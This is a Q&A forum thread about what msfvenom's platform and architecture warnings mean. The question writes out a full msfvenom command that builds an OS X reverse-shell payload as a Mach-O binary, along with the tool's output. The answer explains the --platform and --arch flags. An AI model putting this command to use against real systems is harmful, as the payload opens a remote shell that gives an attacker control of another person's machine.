# Warning generating OS X payload with msfvenom

Tags: msfvenom

I am trying to generate a reverse shell payload using `msfvenom`. When I run

`msfvenom -p osx/x86/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f macho > reverse.macho`

which I found on [this site,](http://security-geek.in/2016/09/07/msfvenom-cheat-sheet/) I get the following output:

```
No platform was selected, choosing Msf::Module::Platform::OSX from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 65 bytes
Final size of macho file: 20800 bytes
```

The file is generated, and it works fine, but I am wondering what the first two lines of that output mean. Is there anything I'm missing?

Answer (score 3, accepted):

"Platform" stands for the OS platform of the payload, whether it is Windows, Linux, OSX, etc. you provide it with

```
--platform
```

"Arch" stands for processor architecture you are targeting (x86, x64). You use

```
--arch
```

Comment: ... and the messages mean that msvenom used defaults for those settings